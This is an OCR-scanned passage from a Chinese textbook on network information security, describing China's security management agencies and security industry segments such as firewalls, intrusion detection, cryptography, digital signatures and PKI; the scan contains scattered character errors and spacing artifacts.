结合 。 由 于 网 络 信 息 安全 涉及 了 信息 产业 部 门 、 保 密 部 门 、 机 要 部 门 、 安 全 部 门 、 公 安 部 
门 、 文 化 部 门 、 宣 传 部 门 等 , 故 上 述 部 门 都 进入 了 管理 过 程 , 按 目前 的 情况 来 看 仍 处 于 “ 齐 
抓 共管 ”的 情形 。 我 国 成 立 了 国家 信息 化 领导 小 组 ,由 国务 院 领导 亲自 任 组 长 ,中 央 国 家 
机 关 有 关 部 委 的 领导 参加 小 组 工作 。 对 上 述 部 门 在 信息 网 络 安全 管理 方面 进行 了 职能 
分 工 , 明 确 了 各 自 的 责任 。 此 外 ,在 信息 产业 部 的 指导 下 成 立 了 “互联 网 协会 ”, 下 设 网 络 
与 信息 安全 工作 委员 会 ,依靠 中 介 组 织 进 行 行业 自律 。 在 信息 安全 基础 设施 建设 方面 ， 
国家 网 络 与 信息 安全 技术 平台 已 初步 建成 ,并 在 此 平台 上 建立 了 “国家 计算 机 网 络 应 急 
处 理 协 调 中 心 ”, 并 初步 形成 以 我 国 十 大 互联 网 运营 单位 应 急 处 理 机 构 为 骨干 ,国家 计算 
机 网 络 应 急 处 理 协调 中 心 为 枢纽 的 基础 网 络 应 急 体系 。 


1. 国家 信息 安全 管理 职能 机 构 


国家 信息 安全 管理 职能 机 构 有 如 下 几 个 。 

1) 公安 机 关 

我 国 将 计算 机 安全 管理 和 监察 的 职责 赋予 了 公安 机 关 , 从 上 至 下 各 级 公安 机 关 相 继 
成 立 了 公共 信息 网 络 安全 监察 机 构 ,管理 的 基本 原则 是 依 块 维护 ,条 块 结合 ,各 区 域内 的 
任何 单位 不 管 其 隶属 关系 如 何 , 计 算 机 信息 网 络 的 安全 和 监察 工作 均 由 当地 公安 机 关 的 
主管 部 门 归 口 管理 。 

2) 国家 安全 机 关 

依据 (中 华人 民 共 和 国 国 家 安全 法 ) 规 定 , 国 家 安全 机 关 是 国家 安全 工作 的 主要 管理 
机 关 。 在 计算 机 网 络 信息 安全 管理 中 ,负责 侦察 计算 机 网 络 上 危害 国家 安全 的 时 间 , 打 
击 利 用 计算 机 网 络 进行 阴谋 颠覆 政府 .分 裂 国家 、 推 翻 社会 主义 制度 的 犯罪 行为 。 

3) 国家 保密 机 关 

根据 (计算 机 信息 系统 保密 管理 暂行 规定 ), 国 家 保密 局 主管 全 国 计 算 机 信息 系统 的 
保密 工作 。 


2. 国家 信息 安全 基础 设施 及 机 构 


信息 安全 基础 设施 是 由 政府 建立 和 控制 的 ,并 为 国家 和 全 社会 在 有 关 信息 安全 的 预 
警 救援 ,监控 \ 侦 控 、 测 评 认证 ,综合 决策 等 方面 提供 服务 的 专门 技术 性 业务 机 构 。 

1) 国家 信息 安全 标准 化 技术 委员 会 

经 国家 标准 化 管理 委员 会 批准 ,全 国信 息 安全 标准 化 技术 委员 会 于 2002 年 4 月 15 
日 正式 成 立 。 该 委员 会 是 我 国政 府 在 信息 安全 专业 领域 内 从 事 信 息 安 全 标准 化 工作 的 
技术 工作 组 织 。 工 作 任务 是 向 国家 标准 化 委员 会 提出 本 专业 标准 化 工作 的 方针 、 政 策 和 
技术 措施 的 建议 ,同时 将 协调 各 有 关 部 门 , 本 着 平等 公开、 协商 的 原则 ,制定 出 一 套 系 
统 , 人 全面. 分布 合理 的 信息 安全 标准 体系 ,以 信息 安全 标准 体系 为 工作 依据 ,有 步骤 、 有 计 
划 地 进行 信息 安全 标准 的 指定 工作 。 目 前 我 国正 式 颁 布 的 信息 安全 相关 国家 标准 已 达 
40 多 项 。 
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2) 国家 信息 安全 产品 测评 认证 机 构 

我 国 参照 国际 惯例 ,基本 建立 了 覆盖 全 国 范围 和 重点 行业 的 测评 认证 体系 。 由 中 国 
信息 安全 产品 测评 认证 中 心 及 其 授权 的 分 支 机构 组 成 ,是 代表 国家 进行 信息 安全 产品 质 
量 检测 认证 的 职能 机 构 , 是 国家 级 的 测评 认证 实体 组 织 。 其 主要 职能 是 : 对 国内 外 信息 
安全 产品 和 信息 技术 进行 测评 和 认证 ,对 国内 外 信息 系统 和 工程 进行 安全 性 评估 和 认 
证 ;对 提供 信息 系统 安全 服务 的 组 织 和 单位 进行 评估 和 认证 ;对 注册 信息 安全 专业 人 员 
的 资质 进行 评估 和 认证 。 为 我 国信 息 安全 服务 行业 的 发 展 和 政府 主管 部 门 的 信息 安全 
管理 以 及 全 社会 选择 信息 安全 服务 提供 一 种 独立 公正 的 评判 依据 。 

3) 国家 计算 机 病毒 应 急 处 理 机 构 

2000 年 8 月 ,国家 信息 化 工作 领导 小 组 计算 机 网 络 与 信息 安全 管理 办 公 室 和 公安 部 
公共 信息 网 络 安全 监察 局 决定 在 计算 机 病毒 防治 产品 检验 中 心 的 基础 上 ,建立 国家 计算 
机 病毒 应 急 处 理 中 心 。 

4) 中 国 计 算 机 网 络 安全 应 急 处 理 协调 中 心 

中 国 计 算 机 网 络 应 急 处 理 协调 中 心 主 要 为 国家 重要 部 门 的 计算 机 网 络 系统 和 国家 
计算 机 网 络 应 急 处 理 体系 的 成 员 ,提供 计算 机 网 络 应 急 处 理 服务 和 技术 支持 ,并 与 国际 
计算 机 安全 组 织 机 构 进行 交流 。 


3. 政府 信息 安全 管理 的 合作 机 构 


政府 单独 行动 无 法 实现 保护 网 络 空间 安全 的 目标 ,必须 依靠 所 有 使 用 信息 网 络 的 部 
门 ,单位 和 公众 。 其 中 包括 如 下 几 个 机 构 。 

1) 应 用 单位 信息 网 络 安全 管理 组 织 

信息 安全 管理 机 构 是 实施 系统 安全 ,进行 安全 管理 的 组 织 保证 。 重 要 部 门 的 安全 问 
题 是 由 专门 机 构 控 制 和 管理 的 ,由 健全 的 安全 管理 机 构 来 实施 系统 的 安全 措施 。 

2) 信息 安全 的 社会 行业 管理 组 织 

行业 组 织 充 分 施展 社会 联动 效益 ,为 广大 网 络 用 户 提供 安全 有 效 的 技术 服务 。 政 府 
职能 部 门 要 依法 指导 行业 组 织 自觉 遵 纪 守 法 ,依法 科学 管理 建立 和 完善 各 种 信息 网 络 
安全 服务 的 有 效 机 制 行为 规范 和 技术 准则 。 目 前 有 中 国 互联 网 协会 ;中 国信 息 产业 商 
会 信息 安全 产业 分 会 等 。 


4. 网 络 安 全 组 织 机 构 中 的 问题 及 对 策 


我 国 组 织 机 构 的 发 展 与 建设 中 还 存在 诸多 问题 。 目 前 各 个 组 织 机 构 还 存在 着 条 块 
分 割 、 职 责 不 清 、 多 头 管理 ,协调 不 力 和 政 出 多 门 的 状况 ,各 部 门 多 数 是 功能 的 简单 每 加 ， 
而 不 是 社会 各 部 门 合力 治理 。 国 内 网 络 安全 团队 数量 较 少 ,难以 应 对 突 发 的 网 络 安全 事 
件 。 且 网 络 信息 安全 管理 体系 还 存在 许多 空白 与 漏洞 . 相 较 于 欧美 国家 该 体系 还 并 不 完 
善 。 虽 说 目前 许多 企业 已 与 政府 进行 网 络 安 全 领域 的 合作 , 且 网 上 许多 新 的 漏洞 平台 层 
出 不 穷 ,例如 ,国家 信息 安全 漏洞 平台 、 乌 云 漏洞 平台 、 漏 洞 盒子 互联 网 安全 测试 平台 、 
360 安全 漏洞 响应 平台 等 ,但 与 企业 ,专业 化 网 络 安全 服务 机 构 的 关系 还 是 不 够 融洽 ,对 
专业 化 网 络 安全 服务 机 构 与 企业 伙伴 的 扶持 力度 也 不 够 。 我 国 网 络 安全 技术 水 平整 体 
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看 来 水 平 较 低 ,成 果 转 化 率 也 不 高 , 相 较 于 国外 成 熟 的 研究 组 织 体系 还 有 不 少 差距 。 

因此 首先 我 们 因 构 建 信息 安全 团队 与 应 急 管理 体系 。 信 息 安 全 团队 是 由 决策 者 、 管 
理 者 以 及 计算 机 \ 信 息 、 通 信安 全 和 网 络 技术 等 方面 专家 为 应 对 突 发 的 信息 安全 事件 而 
组 成 的 专业 组 织 。 其 工作 目标 是 能 够 对 信息 安全 事件 作出 及 时 ,快速 ,准确 的 响应 ,确定 
并 及 时 排除 突 发 事件 ,使 风险 或 损失 最 小 化 。 建 设 形式 多 样 的 网 络 信息 安全 团队 ,有 助 
于 提高 全 社会 的 网 络 信息 安全 响应 能 力 ,为 应 急 处 理 体系 奠定 基础 。 而 在 应 急 管理 体系 
方面 ,国家 应 建立 应 急 协 调 组 织 , 统 一 负责 网 络 信息 安全 应 急 管 理工 作 , 并 结合 行业 与 政 
府 的 优势 ,加 强 管理 。 该 组 织 应 有 公安 、 安 全 保密 、 机 要 、 电 信和 与 军队 相关 的 执法 、 管 理 
或 重要 部 门 的 负责 人 直接 参与 。 

政府 应 发 展 外 部 合作 伙伴 。 这 些 外 部 合作 伙伴 包括 非 政府 组 织 、 信 息 安全 服务 机 
构 \ 企 业 等 。 在 网 络 环 境 日 益 复 杂 的 今天 , 仅 靠 政府 治理 是 不 现实 的 ,政府 需要 社会 力量 
的 参与 ,实现 政府 和 社会 .民众 的 互动 治理 ,以 有 限 的 政府 资源 调动 大 量 的 社会 资源 。 政 
府 可 以 借鉴 国外 的 做 法 ,通过 非 政 府 组 织 方式 建设 网 络 信息 安全 基础 设施 ,这 些 基 础 设 
施 专 门 致 力 于 技术 或 管理 工作 ,直接 支持 政府 部 门 对 网 络 的 管理 。 鼓 励 发 展 专业 的 信息 
安全 服务 行业 ,可 以 提高 国家 在 计算 机 系统 有 害 数据 应 急 处 理 , 公 告 信息 网 络 安全 的 社 
会 预警 .信息 网 络 安全 技术 检测 .信息 网 络 安全 等 级 评审 等 多 种 网 络 安全 服务 的 技术 水 
平 ,为 社会 各 行 各 业 提 供 网 络 信息 安全 保障 。 但 事实 上 ,信息 安全 方面 政府 是 不 应 承担 
全 部 责任 的 ,政府 在 这 方面 更 多 的 是 起 到 主导 、 先 导 作用 。 在 此 基础 上 发 挥 企业 厂商 的 
技术 优势 ,与 企业 广泛 的 进行 合作 ,建立 良好 的 伙伴 关系 ,努力 实现 政府 与 企业 的 双赢 。 

政府 也 应 发 展 我 国 自主 的 信息 安全 科研 组 织 体系 。 加 大 资金 投入 ,协调 和 组 织 有 关 
科研 机 构 和 高 等 院 校 , 充 分 发 挥 各 自 的 技术 优势 ,建立 较为 完整 的 研究 组 织 体系 ,提高 成 
果 转 化 率 。 引 导 和 鼓励 地 方 院 校 .民间 研究 学 会 及 个 人 参与 网 络 信息 安全 研究 ,逐步 形 
成 国家 、 社 会 学 术 团体 .个 人 三 个 层次 相 联系 、. 相 补充 的 研究 体系 。 


215 技术 产业 为 互联 网 安全 提供 技术 支持 和 产业 基础 


技术 向 来 都 是 网 络 安全 攻防 的 焦点 。 首 先 , 网 络 安全 管理 虽然 是 网 络 安全 中 非常 重 
要 的 一 个 组 成 部 分 ,但 最 核心 仍然 是 网 络 技术 。 技 术 手段 仍然 是 解决 很 多 安全 威胁 最 直 
接 、 最 有 效 的 手段 。 其 次 ,近年 来 许多 安全 事件 严重 地 威胁 着 我 国 经 济 的 发 展 ,为 了 使 国 
家 安全 、 社 会 稳定 、 群 众 放心 ,就 需要 建立 自主 可 控 的 网 络 安全 产业 体系 。 而 网 络 信息 安 
全 产业 的 核心 就 是 网 络 安 全 技术 ,网 络 安全 技术 也 是 网 络 安全 产业 发 展 的 基础 。 

网 络 安全 产业 也 十 分 重要 ,其 为 解决 国家 、 企 业 和 个 人 互联 网 安全 问题 提供 了 支撑 。 
首先 ,互联 网 已 经 融 人 了 日 常 工作 与 生活 中 的 方方面面 ,许多 攻击 方式 层出不穷 ,各 种 安 
全 威胁 严重 地 影响 到 互联 网 产业 的 健康 发 展 。 因 此 可 以 说 网 络 安全 产业 是 互联 网 健康 
发 展 的 基础 之 一 。 其 次 ,为 了 保持 国家 竞争 力 ,我 国 必然 要 在 未 来 的 道路 上 向 着 信息 化 
迈进 。 但 我 国 所 采用 的 很 大 一 部 分 产品 都 是 国外 的 技术 产品 或 基础 设备 ,核心 技术 并 没 
有 掌握 在 我 们 手中 ,所 有 的 通信 轻易 地 就 暴露 在 国外 提供 商 的 眼皮 底下 ,当前 的 信息 系 
统 基本 处 于 不 设防 状态 。 只 有 大 力 发 展 自主 互联 网 安全 产业 ,才能 使 核心 技术 不 受制 于 
人 ,以 此 更 好 地 全 面 推进 国家 信息 化 建设 的 进程 。 最 后 ,网 络 安全 产业 也 直接 关系 到 国 
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家 安全 ,是 国家 关键 的 信息 基础 设施 。 支 持 网 络 安全 产业 的 发 展 能 够 更 好 地 为 国家 互联 
网 安全 提供 保障 。 


1. 互联 网 安全 产业 的 概念 与 主要 内 容 


现今 互联 网 包罗 万 象 ,不 仅 是 各 种 传统 媒体 转向 互联 网 ,政府 部 门 也 逐步 开通 网 上 
服务 ,大 部 分 企业 办 公 系 统 也 接 入 了 互联 网 。 互 联网 已 经 成 为 政治 ,经 济 、 文 化 .生活 的 
综合 体 ,已 经 不 再 是 单纯 的 技术 和 管理 问题 ,而 是 成 为 了 整个 社会 的 系统 性 工程 ,而 互联 
网 安全 产业 则 是 对 各 类 网 络 安全 问题 提供 解决 方案 。 

互联 网 安全 产业 , 指 的 是 为 保障 互联 网 安全 提供 技术 、 产 品 和 服务 的 相关 行业 的 总 
称 ,为 解决 国家 、 企 业 和 个 人 互联 网 安全 问题 提供 支撑 。 因 此 ,互联 网 安全 产业 不 仅 要 提 
供 防火 墙 .杀毒 软件 、 入 侵 防御 系统 、 入 侵 检 测 系统 等 网 络 安全 相关 的 软 硬 件 , 还 应 包含 
安全 基础 电子 产品 、 安 全 基础 软件 、 安 全 终端 等 实现 本 质 信息 安全 的 基础 安全 产业 ,以 及 
灾难 备份 产业 和 电子 认证 服务 等 。 


2. 信息 安全 产业 结构 分 类 


信息 安全 产业 结构 分 为 三 类 。 

(1) 信息 安全 硬件 ,其 中 包括 安全 芯片 .加密 芯片 .密码 模块 ,防火墙 /VPN .安全 内 
容 管理 .人 侵 检测 /入 侵 防御 .统一 威胁 管理 .其 他 安全 硬件 。 

(2) 信息 安全 软件 ,其 中 包括 安全 操作 系统 、 安 全 数据 库 .安全 中 间 件 、 安 全 内 容 与 威 
胁 管 理 . 身 份 管理 与 访问 控制 .安全 性 与 漏洞 管理 .其 他 安全 软件 。 

(3) 信息 安全 服务 ,其 中 包括 咨询 服务 .教育 培训 、 解 决 方案 、 其 他 服务 。 


3. 互联 网 安全 产业 按 产业 细 分 


1) 基础 安全 产业 

基础 安全 产业 又 分 为 基础 安全 硬件 与 基础 安全 软件 ,具体 包括 安全 芯片 .安全 操作 
系统 .安全 数据 库 .中 间 件 .密码 产品 等 。 

(1) 安全 芯片 是 芯片 的 一 种 ,主要 是 指 可 信任 平台 模块 .是 一 个 可 独立 进行 密 钥 生 
成 .加 解密 的 装置 ,内 部 拥有 独立 的 处 理 器 和 存储 单元 ,可 存储 密 钥 和 特征 数据 ,为 电脑 
提供 加 密 和 安全 认证 服务 。 用 安全 芯片 进行 加 密 . 密 钥 被 存储 在 硬件 中 ,被 窃 的 数据 无 
法 解密 ,从 而 保护 商业 隐私 和 数据 安全 。 

(2) 安全 操作 系统 是 指 计算 机 信息 系统 在 自主 访问 控制 .强制 访问 控制 标记、 身份 
鉴别 、 客 体重 用、 审计 ` 数 据 完 整 性 、 隐 项 信道 分 析 . 可 信 路 径 、. 可 信 恢 复 等 十 个 方面 满足 
相应 的 安全 技术 要 求 。 安 全 操作 系统 主要 特征 有 : 最 小 特权 原则 , 即 每 个 特权 用 户 只 拥 
有 能 进行 工作 的 权力 ;自主 访问 控制 ;强制 访问 控制 ,包括 保密 性 访问 控制 和 完整 性 访问 
控制 ;安全 审计 ;安全 域 隔离 。 只 要 有 了 这 些 最 底层 的 安全 功能 ,各 种 混 为 “ 应 用 软件 ”的 
病毒 、 木 马 程序 、 网 络 和 人 侵 和 人 为 非法 操作 才能 被 真正 抵制 ,因为 它们 违背 了 操作 系统 的 
安全 规则 ,也 就 失去 了 运行 的 基础 。 

(3) 中 间 件 是 一 种 独立 的 系统 软件 或 服务 程序 ,分 布 式 应 用 软件 借助 这 种 软件 在 不 
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同 的 技术 之 间 共 享 资源 。 中 间 件 位 于 客户 机 /服务 器 的 操作 系统 之 上 ,管理 计算 机 资源 
和 网 络 通信 ,是 连接 两 个 独立 应 用 程序 或 独立 系统 的 软件 。 相 连接 的 系统 ,即使 它们 有 具 
有 不 同 的 接口 ,但 通过 中 间 件 相互 之 间 仍 能 交换 信息 。 执 行 中 间 件 的 一 个 关键 途径 是 信 
息 传递 。 通 过 中 间 件 ,应 用 程序 可 以 工作 于 多 平台 或 OS 环境 。 

(4) 安全 数据 库 通 常 是 指 在 具有 关系 型 数据 库 一 般 功 能 的 基础 上 ,提高 数据 库 安 全 
性 ,达到 美国 TCSEC 和 TDI 的 安全 标记 保护 (B1) 级 标准 ,或 中 国 国家 标准 (计算 机 信息 
系统 安全 保护 等 级 划分 准则 ) 的 第 三 级 (安全 标记 保护 级 ) 以 上 安全 标准 的 数据 库 管 理 系 
统 。 安 全 数据 库 和 普通 数据 库 的 重要 区 别 在 于 安全 数据 库 在 通用 数据 库 的 基础 上 进行 
了 诸多 重要 机 制 的 安全 增强 ,通常 包括 安全 标记 及 强制 访问 控制 (MAC) .数据 存储 加 密 、 
数据 通信 和 加密、 强化 身份 鉴别 ,安全 审计 、 三 权 分 立 等 安全 机 制 。 

(5) 密码 是 一 种 用 来 混淆 的 技术 , 它 希 望 将 正常 的 (可 识别 的 ) 信 息 转变 为 无 法 识别 
的 信息 。 密 码 产 业主 要 是 基于 密码 技术 提供 安全 功能 的 软 硬 件 产 品 。 其 主要 分 为 两 类 。 
一 类 是 基于 数学 的 密码 理论 与 技术 ,具体 包括 公 钥 密码 、 分 组 密码 、 序 列 密码 、 认 证 码 、 
Hash 函数 .PKI 技术 、VPN 技术 等 ;第 二 类 是 非 数 学 的 密码 理论 与 技术 ,主要 包括 信息 
隐藏 ,量子 密码 、 基 于 生物 特征 的 识别 理论 与 技术 等 。 

2) 网 络 安全 产业 

网 络 安全 产业 又 分 为 网 络 安全 硬件 .网 络 安全 软件 和 网 络 安全 服务 。 网 络 安全 软件 
具体 包括 威胁 管理 软件 ,内容 管理 软件 .安全 性 和 漏洞 管理 .身份 与 访问 控制 管理 等 。 网 
络 安全 硬件 具体 包括 防火 墙 /VPN、 入 侵 检 测 (IDS)/ 入 侵 防 御 (IPS)、 统 一 威胁 管理 
(UTM) ,安全 内 容 管理 和 信息 加 密 /身份 认证 等 。 网 络 安全 服务 指 的 是 根据 客户 信息 安 
全 需求 定制 的 信息 安全 解决 方案 ,包含 从 高 端的 全 面 安全 体系 到 细节 的 技术 解决 措施 ， 
主要 涵盖 计划 .实施 . 运 维 .教育 四 个 方面 ,具体 包括 信息 安全 咨询 .等 级 测评 .风险 评估 、 
安全 审计 、. 运 维 管理 .安全 培训 等 。 

(1) 防火 墙 是 一 个 由 软件 和 硬件 设备 组 合 而 成 的 ,在 内 部 网 和 外 部 网 之 间 .专用 网 与 
公共 网 之 间 的 界面 上 构造 的 保护 屏障 。 是 一 种 获取 安全 性 方法 的 形象 说 法 , 它 是 一 种 计 
算 机 硬件 和 软件 的 结合 ,使 互联 网 与 互联 网 之 间 建 立 起 一 个 安全 网 关 , 从 而 保护 内 部 网 
免 受 非法 用 户 的 侵入 ,防火 墙 主要 由 服务 访问 规则 、 验 证 工具 、 包 过 滤 和 应 用 网 关 4 个 部 
分 组 成 ,防火 墙 就 是 一 个 位 于 计算 机 和 它 所 连接 的 网 络 之 间 的 软件 或 硬件 。 该 计算 机 流 
入 流出 的 所 有 网 络 通信 和 数据 包 均 要 经 过 此 防火 墙 。 

(2) 入 侵 检 测 是 对 入 侵 行 为 的 检测 。 它 通过 收集 和 分 析 网 络 行为 .安全 日 志 、 审 计数 
据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 ,检查 网 络 或 系统 
中 是 否 存 在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 作为 一 种 积极 主动 的 安全 
防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ,在 网 络 系 统 受 到 危害 之 前 
拦截 和 响应 入侵 。 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情 
况 下 能 对 网 络 进行 监测 。 入 侵 检测 通过 执行 以 下 任务 来 实现 : 监视 .分 析 用 户 及 系统 活 
动 ;系统 构造 和 弱点 的 审计 ;识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 士 报警 ; 异 常 行为 
模式 的 统计 分 析 ; 评 估 重 要 系统 和 数据 文件 的 完整 性 ;操作 系统 的 审计 跟踪 管理 ,并 识别 
用 户 违 反 安全 策略 的 行为 。 
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(3) 入 侵 防 御 系 统 是 电脑 网 络 安全 设施 ,是 对 防 病毒 软件 和 防火 墙 的 补充 。 入 侵 预 
防 系统 是 一 部 能 够 监视 网 络 或 网 络 设备 的 网 络 资料 传输 行为 的 计算 机 网 络 安全 设备 ,能 
够 即时 的 中 断 、 调 整 或 隔离 一 些 不 正常 或 是 具有 伤害 性 的 网 络 资料 传输 行为 。 

统一 威胁 管理 是 指 一 个 功能 全 面 的 安全 产品 , 它 能 防范 多 种 威胁 。 统 一 威胁 管理 产 
品 通 常 包 括 防火 墙 、 防 病毒 软件 、 内 容 过 滤 和 垃圾 邮件 过 滤器 。 统 一 威胁 管理 的 主要 优 
点 是 简单 、 流 线 型 安装 和 使 用 ,并 且 能 同时 更 新 所 有 的 安全 功能 或 程序 。 虽 然 互联 网 威 
胁 的 性 质 和 多 样 性 变 得 越 来 越 复杂 ,统一 威胁 管理 产品 能 够 通过 调整 来 及 时 防范 这 些 威 
胁 。 这 样 就 不 需要 系统 管理 员 一 直 来 维护 多 种 安全 程序 了 。 

3) 灾难 备份 产业 

灾难 备份 产业 又 分 为 企业 数据 中 心 与 灾难 备份 服务 。 

(1) 数据 中 心 指 的 是 一 整套 复杂 的 设施 。 它 不 仅仅 包括 计算 机 系统 和 其 他 与 之 配套 
的 设备 ,还 包含 元 余 的 数据 通信 连接 .环境 控制 设备 ,监控 设备 以 及 各 种 安全 装置 。 而 企 
业 数 据 中 心 是 数据 中 心 的 一 种 ,主要 基于 数据 中 心 为 大 中 型 企业 提供 生产 经 营 系统 的 运 
行 场所 ,以 及 相应 的 增值 服务 。 

(2) 灾难 备份 指 的 是 为 了 灾难 恢复 而 对 数据 数据 处 理 系统 、 网 络 系统 .基础 设施 、 技 
术 支 持 能 力 和 和 运行 管理 能 力 进 行 备份 的 过 程 。 灾 难 备份 是 灾难 恢复 的 基础 ,是 围绕 着 灾 
难 恢复 所 进行 的 各 类 备份 工作 。 

4) 电子 认证 服务 产业 

电子 认证 服务 产业 又 分 为 身份 认证 服务 与 电子 签名 服务 。 具 体 包括 电子 认证 .电子 
签名 ,数字 签名 与 数字 证 书 . 电 子 认证 服务 。 

(1) 电子 认证 是 以 数字 证 书 为 核心 技术 的 加 密 技术 , 它 以 PKI 技术 为 基础 ,对 网 络 
上 传输 的 信息 进行 加 密 、 解 密 、 数 字 签 名 和 数字 验证 。 电 子 认证 是 电子 政务 和 电子 商务 
中 的 核心 环节 ,可 以 确保 网 上 传递 信息 的 保密 性 ,完整 性 和 不 可 否认 性 ,确保 网 络 应 用 的 
安全 。 

(2) 电子 签名 是 指数 据 电 文中 以 电子 形式 所 含 . 所 附 用 于 识别 签名 人 身份 并 表明 签 
名 人 认可 其 中 内 容 的 数据 。 美 国 (统一 电子 交易 法 ) 规 定 , 电 子 签名 泛 指 “与 电子 记录 相 
联 的 或 在 逻辑 上 相 联 的 电子 声音 ,符合 或 程序 ,而 该 电子 声音 、 符 合 或 程序 是 某 人 为 签署 
电子 记录 的 目的 而 签订 或 采用 的 ”; 联 合 国 《电子 商务 示范 法 ) 中 规定 ,电子 签名 是 包含 、 
附加 在 某 一 数据 电文 内 ,或 逻辑 上 与 某 一 数据 电文 相 联 系 的 电子 形式 的 数据 , 它 能 被 用 
来 证 实 与 此 数据 电文 有 关 的 签名 人 的 身份 ,并 表明 该 签名 人 认可 该 数据 电文 所 载 信 息 ; 
欧盟 的 (电子 签名 指令 ) 规 定 , 电 子 签名 泛 指 “ 与 其 他 电子 记录 相连 的 或 在 逻辑 上 相连 并 
以 此 作为 认证 方法 的 电子 形式 数据 .” 从 上 述 定 义 来 看 ,凡是 能 在 电子 通信 中 ,起 到 证 明 
当事人 身份 .证明 当事人 对 文件 内 容 的 认可 的 电子 技术 手段 ,都 可 被 称 为 电子 签名 ,电子 
签名 即 现代 认证 技术 的 一 般 性 概念 , 它 是 电子 商务 安全 的 重要 保障 手段 。 

(3) 数字 签名 (又 称 公 钥 数 字 签 名 、 电 子 签 章 ) 是 一 种 类 似 写 在 纸 上 的 普通 的 物理 签 
名 ,但 是 使 用 了 公 钥 加 密 领 域 的 技术 实现 ,用 于 鉴别 数字 信息 的 方法 。 一 套数 字 签 名 通 
常 定义 两 种 互补 的 运算 ,一 个 用 于 签名 , 另 一 个 用 于 验证 。 也 可 以 说 数字 签名 就 是 只 有 
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信息 的 发 送 者 才能 产生 的 、 别 人 无 法 伪造 的 一 段 数字 串 , 这 段 数字 串 同时 也 是 对 信息 的 
发 送 者 发 送信 息 真 实 性 的 一 个 有 效 证 明 。 数 字 签 名 是 非 对 称 密 钥 加 密 技术 与 数字 摘要 
技术 的 应 用 。 

(4) 数字 证 书 就 是 互联 网 通信 中 标志 通信 各 方 身份 信息 的 一 串 数字 ,提供 了 一 种 在 
互联 网 上 验证 通信 实体 身份 的 方式 ,数字 证 书 不 是 数字 身份 证 ,而 是 身份 认证 机 构 盖 在 
数字 身份 证 上 的 一 个 章 或 印 ( 或 者 说 加 在 数字 身份 证 上 的 一 个 签名 )。 它 是 由 权威 机 
构 CA 机 构 ,又 称 为 证 书 授权 (Certificate Authority) 中 心 发 行 的 ,人 们 可 以 在 网 上 用 
它 来 识别 对 方 的 身份 。 

(5) 电子 认证 服务 是 基于 数据 电文 接收 人 需要 对 收 到 的 数据 电文 发 送 人 的 身份 及 数 
据 电文 的 真实 性 .完整 性 进行 核实 而 产生 的 。 电 子 认 证 服务 是 指 为 电子 签名 的 真实 性 和 
可 靠 性 提供 证 明 的 活动 ,包括 签名 人 身份 的 真实 性 认证 、 签 名 过 程 的 可 靠 性 认证 和 数据 
电文 的 完整 性 认证 三 个 部 分 ,涉及 数据 电文 的 生成 .传递 接收, 保存、 提取 、 鉴 定 各 环节 ， 
涵盖 电子 认证 专 有 设备 提供 、 基 础 设施 和 运营、 技术 产品 研发 .系统 检测 评估 专业 队伍 建 
设 等 各 方面 ,是 综合 性 高 技术 服务 。 电 子 认 证 服务 机 构 是 指 提供 电子 认证 服务 的 企业 法 
人 .事业 单位 等 主体 ,简称 CA 机 构 (Certificate Authority)。 具 体 来 讲 , 电 子 认证 服务 机 
构 所 提供 的 服务 内 容 包 括 制作 、 签 发 ,管理 数字 证 书 、 确 认 签 发 的 数字 证 书 的 真实 性 、 提 
供 数 字 证 书目 录 信 息 查 询 服务 .提供 数字 证 书 状 态 信 息 查 询 服务 ,等 等 。 
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信息 安全 基础 设施 是 指 为 保证 信息 系统 和 网 络 安全 提供 公共 服务 的 基本 设施 ,设计 
信息 存储 、 信 息 处 理 、 信 息 交 流 、 信 息 交换 过 程 中 信息 完整 性 、 保 密 性 、 不 可 否认 性 、 入 侵 
检测 .攻击 检测 与 防御 .访问 控制 .事件 记录 与 审计 、 物 理 设备 防护 .信息 泄露 防护 等 诸多 
方面 。 信 息 安全 基础 设施 就 是 为 上 述 信息 安全 功能 提供 公共 服务 ,保证 正常 和 运行、 发挥 
作用 的 服务 和 工程 设施 。 其 主要 包含 如 下 内 容 。 


1. 公 钥 基础 设施 (Public Key Infrastructure,PKD) 


公 钥 基础 设施 技术 采用 证 书 管理 公 钥 ,通过 第 三 方 的 可 信任 机 构 一 一 认证 中 心 CA， 
把 用 户 的 公 钥 和 用 户 的 其 他 标识 信息 ,如 名 称 E-mail、 身份 证 号 等 捆绑 在 一 起 ,在 互联 网 
上 验证 用 户 的 身份 。 公 钥 基 础 设施 其 实 就 是 一 种 基础 设施 ,其 目标 就 是 要 充分 利用 公 钥 
密码 学 的 理论 基础 ,建立 起 一 种 普遍 适用 的 基础 设施 ,为 各 种 网 络 应 用 提供 全 面 的 安全 
服务 。 公 开 密 钥 密 码 为 我 们 提供 了 一 种 非 对 称 性 质 , 使 得 安全 的 数字 签名 和 开放 的 签名 
验证 成 为 可 能 。 而 这 种 优秀 技术 的 使 用 却 面临 着 理解 困难 、 实 施 难 度 大 等 问题 。 正 如 让 
电视 机 的 开发 者 理解 和 维护 发 电厂 有 一 定 的 难度 一 样 ,要 让 每 一 个 应 用 程序 的 开发 者 完 
全 正确 地 理解 和 实施 基于 公开 密 钥 密码 的 安全 有 一 定 的 难度 。 公 钥 基 础 设施 希望 通过 
一 种 专业 的 基础 设施 的 开发 ,让 网 络 应 用 系统 的 开发 人 员 从 烦琐 的 密码 技术 中 解脱 出 来 
而 同时 享有 完善 的 安全 服务 。 
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2. 在 线 监测 与 态势 感知 


网 络 已 经 深入 社会 生活 的 各 个 方面 ,为 防范 各 式 各 样 的 安全 威胁 ,许多 不 同 种 类 的 
安全 设备 投入 使 用 。 多 样 的 监测 方式 和 事件 报告 机 制 给 网 络 管理 人 员 提 供 了 多 元 海量 
的 数据 ,但 目前 缺乏 有 效 的 安全 事件 模型 和 管理 工具 来 融合 这 些 数据 ,导致 零散 的 信息 
无 法 提供 决策 层面 的 支持 。 为 了 应 对 这 种 情况 ,在线 监测 与 态势 感知 技术 被 提 了 出 来 ， 
其 目的 为 提取 、 精 炼 、. 融 合 、 深 化 .管理 网 络 所 提供 的 信息 。 将 它们 高 效 组 织 深 化 为 网 络 
